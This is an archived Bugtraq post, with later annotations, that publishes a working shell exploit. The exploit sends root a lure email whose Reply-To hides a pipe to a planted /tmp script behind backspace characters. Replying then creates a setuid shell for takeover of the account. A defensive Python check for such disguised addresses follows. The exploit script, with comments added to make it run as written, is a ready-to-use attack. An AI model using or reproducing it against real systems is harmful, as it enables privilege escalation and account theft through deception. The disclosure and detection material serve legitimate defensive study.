5684958 2000-11-05 21:56 +0000 /104 lines/ gregory duchemin <c3rb3r@HOTMAIL.COM>
Sent by: joel@lysator.liu.se
Imported: 2000-11-06 08:40 by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: c3rb3r@HOTMAIL.COM
Recipient: Bugtraq (import) <13599>
Subject: mail Reply-To field exploit
------------------------------------------------------------
From: gregory duchemin <c3rb3r@HOTMAIL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <F282z4r02V5xm4iZrbU00009213@hotmail.com>

Hi all,

Because there are a few people here who didn't seem to understand how serious the mail.local/mail/sendmail weakness I reported to Bugtraq a few days ago is (lack of imagination?), here is an exploit, not technically impressive but just powerful enough to deceive many people around here and take over their account privileges.

I persist in claiming that no | char should be allowed in any SMTP/LMTP/MIME field (even in contradiction with any RFC) because of the major security vulnerability it introduces.

Note: it's NOT A BUG in mail, sendmail or mail.local but a weakness caused by blind RFC compliance. I didn't try elm, mailx and others, so feedback is welcome.

Payback here is victim account takeover by spawning a setuid shell in /tmp (even root).

Solution: take care about the real anatomy of the Reply-To recipient.
:)

Cheers,
Gregory Duchemin

I LOVE YOU letter for Unix
==========================

#!/bin/sh
#
# I-Love-U.sh
# Exploit for | char in mail Reply-To field
# tested on linux Caldera (techno preview linux 2.4.0)
#
# Gregory Duchemin ( AKA C3rb3r )
# Security Consultant
#
# NEUROCOM CANADA
# 1001 bd Maisonneuve Ouest
# Montreal (Quebec) H3A 3C8 Canada
# c3rb3r@hotmail.com
#
# Cook Ingredients: one | char (hidden in an uppercase i),
# a bit of evil ^H to hide "/tmp/", and a girl to stimulate a reply ;)
#
# The posted script contained literal backspace bytes (0x08), which the
# archive shows as ^H. HIDE holds five of them so the script runs as written:
# on a terminal they erase the "/tmp/" typed just before them.
BS=$(printf '\b')
HIDE="${BS}${BS}${BS}${BS}${BS}"

cd /tmp
# Write the payload under the disguised filename (the '>' redirect is restored
# here; the archived copy dropped it, and without it cat only reads the file).
# The victim's reply pipes the mail into this file via the | in Reply-To.
cat > "${HIDE}sabelle@hotmail.com" << _End
#!/bin/sh
cp /bin/sh /tmp/newsh
chmod a+rws /tmp/newsh
_End

{
sleep 1
echo "HELO hotmail.com"
sleep 1
echo "MAIL FROM:<Isabelle@hotmail.com>"
sleep 1
echo "RCPT TO:<root>"
sleep 1
echo "DATA"
sleep 1
# Reply-To will appear as Reply-To:<|sabelle@hotmail.com>
# (the | passes for an uppercase I, the backspaces hide /tmp/)
echo "Reply-To:<|/tmp/${HIDE}sabelle@hotmail.com>"
sleep 1
echo
echo "I saw you yesterday, since I'm a bit confused.. I just wanted"
echo "to say you."
echo "I believe I LOVE YOU"
echo
echo "Isabelle."
echo "."
sleep 1
echo "QUIT"
sleep 2
} | telnet localhost 25

echo "Job is done...now check for newsh in /tmp"
echo
echo
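As an added example (not part of Gregory's post or of any mail program), the following Python check shows the "real anatomy" of such a Reply-To. It parses a constructed message carrying the same disguised address the script above sends, renders the address the way a terminal would (each backspace erasing the character before it), and flags the pipe character, the control characters, and the mismatch between what is displayed and what a mail user agent would actually hand to sendmail as a recipient. The sample messages, the finding names and the function names are my own assumptions for this illustration.

```python
"""Audit Reply-To / From addresses for the pipe-and-backspace disguise.

Added example, not code from the Bugtraq post. The sample messages, the
finding names and the function names are assumptions made for illustration.
"""
import email
import re

# Constructed sample: the headers the post's script sends over SMTP.
# "\x08" is the literal backspace byte that the archive renders as ^H.
SAMPLE_MESSAGE = (
    "From: Isabelle@hotmail.com\r\n"
    "To: root\r\n"
    "Reply-To: <|/tmp/\x08\x08\x08\x08\x08sabelle@hotmail.com>\r\n"
    "Subject: I LOVE YOU\r\n"
    "\r\n"
    "I believe I LOVE YOU\r\n"
)

# Constructed control case with an honest Reply-To.
CLEAN_MESSAGE = (
    "From: Isabelle@hotmail.com\r\n"
    "To: root\r\n"
    "Reply-To: <Isabelle@hotmail.com>\r\n"
    "\r\n"
    "hello\r\n"
)

CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def render_as_terminal(text):
    """What a terminal shows: each backspace erases the character before it."""
    shown = []
    for ch in text:
        if ch == "\x08":
            if shown:
                shown.pop()
        else:
            shown.append(ch)
    return "".join(shown)


def extract_addr_spec(header_value):
    """Return the addr-spec inside <...>, or the whole value if no brackets."""
    m = re.search(r"<([^>]*)>", header_value)
    return m.group(1) if m else header_value.strip()


def audit_address(addr_spec):
    """List why this addr-spec is dangerous to hand to sendmail as a recipient."""
    findings = []
    if "|" in addr_spec:
        # sendmail treats a recipient that begins with | as a program to pipe
        # the message into; the post argues | should never be accepted at all.
        findings.append("pipe")
    if CONTROL_CHARS.search(addr_spec):
        findings.append("control-chars")
    if render_as_terminal(addr_spec) != addr_spec:
        # what the user sees is not what the MUA will pass on
        findings.append("disguised")
    return findings


def audit_reply_to(raw_message):
    """Parse a message and audit its Reply-To (falling back to From)."""
    msg = email.message_from_string(raw_message)
    header = msg.get("Reply-To") or msg.get("From", "")
    addr = extract_addr_spec(header)
    return {
        "raw": addr,
        "displayed": render_as_terminal(addr),
        "findings": audit_address(addr),
    }


if __name__ == "__main__":
    for label, message in (("disguised", SAMPLE_MESSAGE), ("clean", CLEAN_MESSAGE)):
        result = audit_reply_to(message)
        print(label, repr(result["raw"]), "->", result["displayed"], result["findings"])
```

The raw address the reply would be sent to is `|/tmp/<5 backspaces>sabelle@hotmail.com`; on screen it reads `|sabelle@hotmail.com`, which a reader takes for `Isabelle@hotmail.com`. The check deliberately looks at the bytes, not the rendering, which is the whole point of the "real anatomy" advice.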